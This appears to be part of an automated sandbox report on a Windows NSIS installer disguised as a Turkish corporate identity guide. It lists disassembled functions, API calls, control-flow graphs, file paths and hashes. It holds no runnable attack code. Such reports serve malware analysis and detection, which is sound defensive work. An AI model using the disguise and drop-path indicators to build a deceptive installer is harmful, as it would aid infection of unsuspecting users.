                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Thaumaturgical146$C:\Users\user\Desktop$C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe$Error launching installer$Fjernbetjeningsenhedernes Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                          • API String ID: 3441113951-3960451553
                                                                                                                                                                                          • Opcode ID: c69f0a08dcb2e1d024cd1a682ba050e32cb95b0861efa09548cea5cd73a41d6c
                                                                                                                                                                                          • Instruction ID: 34b402965a056e7880f406cddf034ee68ffb155d70387f36a3cc73b0da0a8952
                                                                                                                                                                                          • Opcode Fuzzy Hash: c69f0a08dcb2e1d024cd1a682ba050e32cb95b0861efa09548cea5cd73a41d6c
                                                                                                                                                                                          • Instruction Fuzzy Hash: FBD11571500310ABE720BF659D45B2B3AACEB4074AF10447FF881B62E1DBBD9E45876E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00404C9E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 139 404c9e-404cea GetDlgItem * 2 140 404cf0-404d84 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->140 141 404f0b-404f12 139->141 142 404d93-404d9a DeleteObject 140->142 143 404d86-404d91 SendMessageW 140->143 144 404f14-404f24 141->144 145 404f26 141->145 147 404d9c-404da4 142->147 143->142 146 404f29-404f32 144->146 145->146 148 404f34-404f37 146->148 149 404f3d-404f43 146->149 150 404da6-404da9 147->150 151 404dcd-404dd1 147->151 148->149 152 405021-405028 148->152 155 404f52-404f59 149->155 156 404f45-404f4c 149->156 153 404dab 150->153 154 404dae-404dcb call 4062dc SendMessageW * 2 150->154 151->147 157 404dd3-404dff call 404231 * 2 151->157 162 405099-4050a1 152->162 163 40502a-405030 152->163 153->154 154->151 159 404f5b-404f5e 155->159 160 404fce-404fd1 155->160 156->152 156->155 199 404e05-404e0b 157->199 200 404eca-404edd GetWindowLongW SetWindowLongW 157->200 168 404f60-404f67 159->168 169 404f69-404f7e call 404bec 159->169 160->152 164 404fd3-404fdd 160->164 166 4050a3-4050a9 SendMessageW 162->166 167 4050ab-4050b2 162->167 171 405281-405293 call 404298 163->171 172 405036-405040 163->172 175 404fed-404ff7 164->175 176 404fdf-404feb SendMessageW 164->176 166->167 177 4050b4-4050bb 167->177 178 4050e6-4050ed 167->178 168->160 168->169 169->160 198 404f80-404f91 169->198 172->171 173 405046-405055 SendMessageW 172->173 173->171 183 40505b-40506c SendMessageW 173->183 175->152 185 404ff9-405003 175->185 176->175 186 4050c4-4050cb 177->186 187 4050bd-4050be ImageList_Destroy 177->187 181 405243-40524a 178->181 182 4050f3-4050ff call 4011ef 178->182 181->171 193 40524c-405253 181->193 209 405101-405104 182->209 210 40510f-405112 182->210 191 405076-405078 183->191 192 40506e-405074 183->192 194 405014-40501e 185->194 195 405005-405012 185->195 196 4050d4-4050e0 186->196 197 4050cd-4050ce GlobalFree 186->197 187->186 203 405079-405092 call 401299 SendMessageW 191->203 192->191 192->203 193->171 204 405255-40527f ShowWindow GetDlgItem ShowWindow 193->204 194->152 195->152 196->178 197->196 198->160 206 404f93-404f95 198->206 201 404e0e-404e15 199->201 205 404ee3-404ee7 200->205 207 404eab-404ebe 201->207 208 404e1b-404e43 201->208 203->162 204->171 212 404f01-404f09 call 404266 205->212 213 404ee9-404efc ShowWindow call 404266 205->213 214 404f97-404f9e 206->214 215 404fa8 206->215 207->201 224 404ec4-404ec8 207->224 218 404e45-404e7b SendMessageW 208->218 219 404e7d-404e7f 208->219 221 405106 209->221 222 405107-40510a call 404c6c 209->222 225 405153-405177 call 4011ef 210->225 226 405114-40512d call 4012e2 call 401299 210->226 212->141 213->171 216 404fa0-404fa2 214->216 217 404fa4-404fa6 214->217 220 404fab-404fc7 call 40117d 215->220 216->220 217->220 218->207 230 404e81-404e90 SendMessageW 219->230 231 404e92-404ea8 SendMessageW 219->231 220->160 221->222 222->210 224->200 224->205 240 405219-40522d InvalidateRect 225->240 241 40517d 225->241 249 40513d-40514c SendMessageW 226->249 250 40512f-405135 226->250 230->207 231->207 240->181 245 40522f-40523e call 404bbf call 404ba7 240->245 243 405180-40518b 241->243 246 405201-405213 243->246 247 40518d-40519c 243->247 245->181 246->240 246->243 252 40519e-4051ab 247->252 253 4051af-4051b2 247->253 249->225 254 405137 250->254 255 405138-40513b 250->255 252->253 256 4051b4-4051b7 253->256 257 4051b9-4051c2 253->257 254->255 255->249 255->250 259 4051c7-4051ff SendMessageW * 2 256->259 257->259 260 4051c4 257->260 259->246 260->259
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404CB6
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404CC1
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D0B
                                                                                                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404D1E
                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000FC,00405296), ref: 00404D37
                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D4B
                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D5D
                                                                                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404D73
                                                                                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D7F
                                                                                                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D91
                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00404D94
                                                                                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404DBF
                                                                                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DCB
                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E61
                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E8C
                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EA0
                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404ECF
                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EDD
                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404EEE
                                                                                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FEB
                                                                                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405050
                                                                                                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405065
                                                                                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405089
                                                                                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050A9
                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004050BE
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 004050CE
                                                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405147
                                                                                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004051F0
                                                                                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051FF
                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0040521F
                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 0040526D
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00405278
                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 0040527F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                          • String ID: $M$N
                                                                                                                                                                                          • API String ID: 1638840714-813528018
                                                                                                                                                                                          • Opcode ID: d7fb2f4892de50fbc14c1a930a22a2945486bdf273952240de52388985094c93
                                                                                                                                                                                          • Instruction ID: f888d98cc81d7f01a919363da6f821789f230268a52e2f70c0503caf05bd5b25
                                                                                                                                                                                          • Opcode Fuzzy Hash: d7fb2f4892de50fbc14c1a930a22a2945486bdf273952240de52388985094c93
                                                                                                                                                                                          • Instruction Fuzzy Hash: BB026FB0900209EFDB109FA4DD85AAE7BB5FB84314F14857AF610BA2E0C7799D52CF58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 6F3D1B5F Relevance: 20.1, APIs: 13, Instructions: 576stringlibrarymemoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6F3D121B: GlobalAlloc.KERNELBASE(00000040,?,6F3D123B,?,6F3D12DF,00000019,6F3D11BE,-000000A0), ref: 6F3D1225
                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6F3D1C6B
                                                                                                                                                                                          • lstrcpyW.KERNEL32(00000008,?), ref: 6F3D1CB3
                                                                                                                                                                                          • lstrcpyW.KERNEL32(00000808,?), ref: 6F3D1CBD
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 6F3D1CD0
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 6F3D1DB2
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 6F3D1DB7
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 6F3D1DBC
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 6F3D1FA6
                                                                                                                                                                                          • lstrcpyW.KERNEL32(?,?), ref: 6F3D2140
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000008), ref: 6F3D21B5
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(00000008), ref: 6F3D21C6
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 6F3D2220
                                                                                                                                                                                          • lstrlenW.KERNEL32(00000808), ref: 6F3D223A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35537090100.000000006F3D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F3D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35537038422.000000006F3D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35537142179.000000006F3D4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35537193155.000000006F3D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6f3d0000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 245916457-0
                                                                                                                                                                                          • Opcode ID: 3c6a2a12b0fd3c5164160e8561539b16a53277e765c07fb84be04fdc43882540
                                                                                                                                                                                          • Instruction ID: 9b0618ee9d03df7e757dc887a7b14b4dc98491f628373c8215c2938e95ef56f2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c6a2a12b0fd3c5164160e8561539b16a53277e765c07fb84be04fdc43882540
                                                                                                                                                                                          • Instruction Fuzzy Hash: E5228C73D44205DBEB10AFB8C6806EDB7B8FF05315F10462AF1A5E7280D7B5AA84CB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004059CC Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 783 4059cc-4059f2 call 405c97 786 4059f4-405a06 DeleteFileW 783->786 787 405a0b-405a12 783->787 788 405b88-405b8c 786->788 789 405a14-405a16 787->789 790 405a25-405a35 call 4062ba 787->790 791 405b36-405b3b 789->791 792 405a1c-405a1f 789->792 796 405a44-405a45 call 405bdb 790->796 797 405a37-405a42 lstrcatW 790->797 791->788 795 405b3d-405b40 791->795 792->790 792->791 798 405b42-405b48 795->798 799 405b4a-405b52 call 4065fd 795->799 800 405a4a-405a4e 796->800 797->800 798->788 799->788 807 405b54-405b68 call 405b8f call 405984 799->807 803 405a50-405a58 800->803 804 405a5a-405a60 lstrcatW 800->804 803->804 806 405a65-405a81 lstrlenW FindFirstFileW 803->806 804->806 809 405a87-405a8f 806->809 810 405b2b-405b2f 806->810 823 405b80-405b83 call 405322 807->823 824 405b6a-405b6d 807->824 813 405a91-405a99 809->813 814 405aaf-405ac3 call 4062ba 809->814 810->791 812 405b31 810->812 812->791 815 405a9b-405aa3 813->815 816 405b0e-405b1e FindNextFileW 813->816 825 405ac5-405acd 814->825 826 405ada-405ae5 call 405984 814->826 815->814 819 405aa5-405aad 815->819 816->809 822 405b24-405b25 FindClose 816->822 819->814 819->816 822->810 823->788 824->798 827 405b6f-405b7e call 405322 call 406080 824->827 825->816 828 405acf-405ad8 call 4059cc 825->828 836 405b06-405b09 call 405322 826->836 837 405ae7-405aea 826->837 827->788 828->816 836->816 840 405aec-405afc call 405322 call 406080 837->840 841 405afe-405b04 837->841 840->816 841->816
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76FC3420,00000000), ref: 004059F5
                                                                                                                                                                                          • lstrcatW.KERNEL32(0042F250,\*.*), ref: 00405A3D
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405A60
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,76FC3420,00000000), ref: 00405A66
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(0042F250,?,?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,76FC3420,00000000), ref: 00405A76
                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B16
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00405B25
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • "C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe", xrefs: 004059CC
                                                                                                                                                                                          • \*.*, xrefs: 00405A37
                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004059DA
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                          • API String ID: 2035342205-2517841759
                                                                                                                                                                                          • Opcode ID: b938c9d9068cedab339b19568100d2823c17cca8f6ff83e158d789dc8ab7bbfb
                                                                                                                                                                                          • Instruction ID: 87b7c1c15068e6398432f2de95375e915c3ae258b511550e47b187391169d043
                                                                                                                                                                                          • Opcode Fuzzy Hash: b938c9d9068cedab339b19568100d2823c17cca8f6ff83e158d789dc8ab7bbfb
                                                                                                                                                                                          • Instruction Fuzzy Hash: EE41E430900914BACB21AB618C89ABF7778EF45768F50427FF801B11D1D77CA982DE6E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004065FD Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,00430298,0042FA50,00405CE0,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,76FC3420,004059EC,?,C:\Users\user\AppData\Local\Temp\,76FC3420), ref: 00406608
                                                                                                                                                                                          • FindClose.KERNELBASE(00000000), ref: 00406614
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                                                          • Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                                                                                                                                                          • Instruction ID: 1ab566c2093321911261fd6ef708f8cedd572ce36bb67071c96f4f7979b88ecc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AD012315051205BC3401B386E0C85B7A599F55331B159F37F86AF51E0DB758C72869C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00403D58 Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 261 403d58-403d6a 262 403d70-403d76 261->262 263 403eab-403eba 261->263 262->263 266 403d7c-403d85 262->266 264 403f09-403f1e 263->264 265 403ebc-403f04 GetDlgItem * 2 call 404231 SetClassLongW call 40140b 263->265 270 403f20-403f23 264->270 271 403f5e-403f63 call 40427d 264->271 265->264 267 403d87-403d94 SetWindowPos 266->267 268 403d9a-403d9d 266->268 267->268 272 403db7-403dbd 268->272 273 403d9f-403db1 ShowWindow 268->273 275 403f25-403f30 call 401389 270->275 276 403f56-403f58 270->276 283 403f68-403f83 271->283 278 403dd9-403ddc 272->278 279 403dbf-403dd4 DestroyWindow 272->279 273->272 275->276 298 403f32-403f51 SendMessageW 275->298 276->271 282 4041fe 276->282 289 403dde-403dea SetWindowLongW 278->289 290 403def-403df5 278->290 286 4041db-4041e1 279->286 288 404200-404207 282->288 284 403f85-403f87 call 40140b 283->284 285 403f8c-403f92 283->285 284->285 294 403f98-403fa3 285->294 295 4041bc-4041d5 DestroyWindow EndDialog 285->295 286->282 293 4041e3-4041e9 286->293 289->288 296 403e98-403ea6 call 404298 290->296 297 403dfb-403e0c GetDlgItem 290->297 293->282 299 4041eb-4041f4 ShowWindow 293->299 294->295 300 403fa9-403ff6 call 4062dc call 404231 * 3 GetDlgItem 294->300 295->286 296->288 301 403e2b-403e2e 297->301 302 403e0e-403e25 SendMessageW IsWindowEnabled 297->302 298->288 299->282 331 404000-40403c ShowWindow KiUserCallbackDispatcher call 404253 EnableWindow 300->331 332 403ff8-403ffd 300->332 305 403e30-403e31 301->305 306 403e33-403e36 301->306 302->282 302->301 309 403e61-403e66 call 40420a 305->309 310 403e44-403e49 306->310 311 403e38-403e3e 306->311 309->296 312 403e4b-403e51 310->312 313 403e7f-403e92 SendMessageW 310->313 311->313 316 403e40-403e42 311->316 317 403e53-403e59 call 40140b 312->317 318 403e68-403e71 call 40140b 312->318 313->296 316->309 327 403e5f 317->327 318->296 328 403e73-403e7d 318->328 327->309 328->327 335 404041 331->335 336 40403e-40403f 331->336 332->331 337 404043-404071 GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 404073-404084 SendMessageW 337->338 339 404086 337->339 340 40408c-4040cb call 404266 call 403d39 call 4062ba lstrlenW call 4062dc SetWindowTextW call 401389 338->340 339->340 340->283 351 4040d1-4040d3 340->351 351->283 352 4040d9-4040dd 351->352 353 4040fc-404110 DestroyWindow 352->353 354 4040df-4040e5 352->354 353->286 356 404116-404143 CreateDialogParamW 353->356 354->282 355 4040eb-4040f1 354->355 355->283 357 4040f7 355->357 356->286 358 404149-4041a0 call 404231 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->282 358->282 363 4041a2-4041ba ShowWindow call 40427d 358->363 363->286
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D94
                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00403DB1
                                                                                                                                                                                          • DestroyWindow.USER32 ref: 00403DC5
                                                                                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DE1
                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403E02
                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E16
                                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403E1D
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403ECB
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403ED5
                                                                                                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403EEF
                                                                                                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F40
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403FE6
                                                                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00404007
                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404019
                                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 00404034
                                                                                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040404A
                                                                                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 00404051
                                                                                                                                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404069
                                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040407C
                                                                                                                                                                                          • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 004040A6
                                                                                                                                                                                          • SetWindowTextW.USER32(?,0042D248), ref: 004040BA
                                                                                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 004041EE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3282139019-0
